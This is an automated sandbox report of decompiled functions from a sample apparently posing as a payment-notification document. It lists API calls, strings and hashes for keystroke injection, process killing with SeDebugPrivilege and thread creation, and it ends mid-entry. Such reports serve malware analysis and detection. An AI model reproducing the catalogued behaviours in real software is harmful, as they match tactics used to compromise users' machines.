Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
Instruction ID: 0f2b23a9740c96e01cc2da8f24400dd22d5ccdb5deb80c8f0175f09d98898de9
Opcode Fuzzy Hash: de5afff2535be22c7f04d54f49e5b7ab2d85e799f7249f99999d63d4f51533ab
Instruction Fuzzy Hash: EF317CB1204701AFDB21DFA6DC44A66BBEDFF58312F00441DF96A86611DB34E858ABA0

Function 009425A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 009425BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009425DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009425DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 009425E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00942601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00942605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0094260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00942623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00942627

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
Instruction ID: 4d9cdf693725b0f06d960dfcc256a99f7ea70c7d4a47327737e4355466648742
Opcode Fuzzy Hash: 196ca80be61a40e5dd44d392181488dc3ffe1051ed91522f7186d1e21b374f92
Instruction Fuzzy Hash: EE01D871398210BBFB1067689C8AF593F59DF8EB11F500015F318AE0D1C9E11484DA69

Function 00941803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00941449,?,?,00000000), ref: 0094180C
HeapAlloc.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941828
GetCurrentProcess.KERNEL32(?,00000000,?,00941449,?,?,00000000), ref: 00941830
DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 00941833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00941449,?,?,00000000), ref: 00941843
GetCurrentProcess.KERNEL32(00941449,00000000,?,00941449,?,?,00000000), ref: 0094184B
DuplicateHandle.KERNEL32(00000000,?,00941449,?,?,00000000), ref: 0094184E
CreateThread.KERNEL32(00000000,00000000,00941874,00000000,00000000,00000000), ref: 00941868

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
Instruction ID: c5b06ff83c779dde5d6ff82a00e3354852451d86fd312557916b897b510eca49
Opcode Fuzzy Hash: 8b23c1626e3ac3ff65fb641cc930949ccc970fef8e0d13e68a1e402309523a18
Instruction Fuzzy Hash: E501BFB6254304FFE710AB65DC4DF573B6CEB89B11F404425FA05DB191CA709840DB20

Function 0096A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0094D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
Part of subcall function 0094D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
Part of subcall function 0094D4DC: CloseHandle.KERNEL32(00000000), ref: 0094D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A16D
GetLastError.KERNEL32 ref: 0096A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0096A268
GetLastError.KERNEL32(00000000), ref: 0096A273
CloseHandle.KERNEL32(00000000), ref: 0096A2C4

Strings

SeDebugPrivilege, xrefs: 0096A18F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
Instruction ID: ee0a297b16cbb9a84607fe3d43ee97921810ef675fdc45366d329401e4758ded
Opcode Fuzzy Hash: 5e65ab6c22b34665261b1d46bda6d1a105197e365d36d363e0fc3628061cb1db
Instruction Fuzzy Hash: 5F61DE712082429FD320DF19C894F16BBE5AF45318F14849CE46A9B7A3C776EC85CF92

Function 00973886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00973925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0097393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00973954
_wcslen.LIBCMT ref: 00973999
SendMessageW.USER32(?,00001057,00000000,?), ref: 009739C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009739F4

Strings

SysListView32, xrefs: 009738F7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
Instruction ID: 1d0878cbe4f299e479d267f78d83fe3d328364b0417873eb37236effa4003adb
Opcode Fuzzy Hash: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
Instruction Fuzzy Hash: 4841B472A00219ABDF219F64CC45BEA77A9FF48354F10852AF95CE7281D7719E80DB90

Function 0094BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0094BCFD
IsMenu.USER32(00000000), ref: 0094BD1D
CreatePopupMenu.USER32 ref: 0094BD53
GetMenuItemCount.USER32(01997190), ref: 0094BDA4
InsertMenuItemW.USER32(01997190,?,00000001,00000030), ref: 0094BDCC

Strings

0, xrefs: 0094BCA8
2, xrefs: 0094BD37

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
Instruction ID: ba3007f53e2314ba00246971bbba066a74d716c06cb4f94aba6ba1f38f157c76
Opcode Fuzzy Hash: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
Instruction Fuzzy Hash: 4451ADB0A042059BDF20CFA8D8C4FAEBBF8BF85314F144699E5559B2D0D770D945CB61

Function 0094C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0094C913

Strings

warning, xrefs: 0094C8FC
stop, xrefs: 0094C8E4
question, xrefs: 0094C8CC
info, xrefs: 0094C8B4
blank, xrefs: 0094C895

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
Instruction ID: 046ae63edffb9cf5bd845eb527c79688382a1b9dfa0e7f07c4c2fb872752b632
Opcode Fuzzy Hash: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
Instruction Fuzzy Hash: 651150B279A306BEE7046B14DD83DAE379CDF56318B10002EF500A62C2EB745E4053A4

Function 0094ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0094ED2A
_wcslen.LIBCMT ref: 0094ED3B
_wcslen.LIBCMT ref: 0094ED79
_wcslen.LIBCMT ref: 0094EDAF
_wcslen.LIBCMT ref: 0094EDDF
_wcslen.LIBCMT ref: 0094EDEF
_wcslen.LIBCMT ref: 0094EE2B
_wcslen.LIBCMT ref: 0094EE5A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
Instruction ID: 179d6086bdef115768d8ad02057f888e7a71903bd8d0b43763bc46c4571a934d
Opcode Fuzzy Hash: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
Instruction Fuzzy Hash: 76419565C10118B9CB11EBF8C88AECFB7ACAF85710F508462F524E31A1FB34E255C7A5

Function 008FF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 008FF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F454

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
Instruction ID: 1ba65263f02dc769313b668341015d68cf7a71e19209ae0725908dd7f89dce2f
Opcode Fuzzy Hash: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
Instruction Fuzzy Hash: 7D412831718688BAC7388B39899C73A7F95FF56314F54443CE38BD2672D6B2A880DB11

Function 00972D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00972D1B
GetDC.USER32(00000000), ref: 00972D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00972D2E
ReleaseDC.USER32(00000000,00000000), ref: 00972D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00972D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00972D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00975A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00972DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00972DE1

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
Instruction ID: a788378a3a4594d6f91e43b24cc000862beed55d3b20706040d133286b87aaca
Opcode Fuzzy Hash: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
Instruction Fuzzy Hash: 8B317F72215214BFEB214F50CC89FEB3BADEF09715F044059FE0C9A291D6759C90C7A4

Function 00945622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00945637
_memcmp.LIBVCRUNTIME ref: 00945659
_memcmp.LIBVCRUNTIME ref: 00945671
_memcmp.LIBVCRUNTIME ref: 00945684
_memcmp.LIBVCRUNTIME ref: 0094569E
_memcmp.LIBVCRUNTIME ref: 009456B1
_memcmp.LIBVCRUNTIME ref: 009456C9
_memcmp.LIBVCRUNTIME ref: 009456E4

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
Instruction ID: bd64fa21f1438fefc0509db32ba4cdffd49c168e15fe990b3c2c7d03085d6bf7
Opcode Fuzzy Hash: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
Instruction Fuzzy Hash: EA21C672640A097BD61956608E92FFA339CBFA1788F564030FD08AA683F725ED11C5A9

Function 00964FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0096502E, 00965383
Not an Object type, xrefs: 00965007

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: b30c97609ceed50eea95c569787dc0c7941b7bdd0f0facf3dfb7a92411f0b1a8
Instruction ID: 36aa3f599022bb9879afecbc62a5d84ac0b86a8355c7057b9fdbe3ed28537f72
Opcode Fuzzy Hash: b30c97609ceed50eea95c569787dc0c7941b7bdd0f0facf3dfb7a92411f0b1a8
Instruction Fuzzy Hash: F1D1A471A0060AAFDF10CF98C891FAEB7B9FF88344F168469E915AB281E771DD45CB50

Function 00921522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 009215CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00921651
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009216E4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009216FB

Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00921777
__freea.LIBCMT ref: 009217A2
__freea.LIBCMT ref: 009217AE

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
Instruction ID: e215617854fcbb395f20b45de2674414e2bb13b04f77c8e707a7c0c34ab2e5ba
Opcode Fuzzy Hash: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
Instruction Fuzzy Hash: 6091D672E002269EDF208E74E841EEE7BBD9FA5310F184569F805E7149D735CD90CBA0

Function 00964523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00964648
VariantInit.OLEAUT32(?), ref: 00964749
VariantClear.OLEAUT32(?), ref: 00964753
VariantClear.OLEAUT32(?), ref: 009647B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0096472C
Null Object assignment in FOR..IN loop, xrefs: 009645D8, 00964706, 009647BE

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 1dd7156286c2526bb7035d4c344c156f33babfffbf34779d6a23c9e04b41c769
Instruction ID: b673fc7c8a87323104c8f1637fe6281ea626306de1b5a1c17b21b0294b4c4b10
Opcode Fuzzy Hash: 1dd7156286c2526bb7035d4c344c156f33babfffbf34779d6a23c9e04b41c769
Instruction Fuzzy Hash: 61917971A00219AFDF20CFA5CC89FAEBBB8EF86714F108559F515AB280D7709945CFA0

Function 00951187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0095125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00951284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009512A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009512D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0095135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009513C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00951430

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 93c18ee9403dfe4f0d00bc398b39ada1288118f2b37c0c5dbfcb85f4f045a999
Instruction ID: bcd6e447ebadeff758e0525122711eeb6a971a84a24338d0013d19078bce2e3b
Opcode Fuzzy Hash: 93c18ee9403dfe4f0d00bc398b39ada1288118f2b37c0c5dbfcb85f4f045a999
Instruction Fuzzy Hash: EE910871900209AFDB00DFAAC885BBE77B9FF45316F104429ED50E72A1D778E949CB51

Function 008F948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
Instruction ID: 7074044fe9b12928a1bc6b6b7b8b528f3f1c4c1abae41bb1d70950263cfcc530
Opcode Fuzzy Hash: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
Instruction Fuzzy Hash: 9D911471904219AFCB14CFA9C884AEEBBB8FF49320F148459E655F7251D378A941DBA0

Function 00963947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0096396B
CharUpperBuffW.USER32(?,?), ref: 00963A7A
_wcslen.LIBCMT ref: 00963A8A
VariantClear.OLEAUT32(?), ref: 00963C1F

Part of subcall function 00950CDF: VariantInit.OLEAUT32(00000000), ref: 00950D1F
Part of subcall function 00950CDF: VariantCopy.OLEAUT32(?,?), ref: 00950D28
Part of subcall function 00950CDF: VariantClear.OLEAUT32(?), ref: 00950D34

Strings

Incorrect Parameter format, xrefs: 009639A6, 00963BA1
AUTOIT.ERROR, xrefs: 00963A80, 00963A85

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

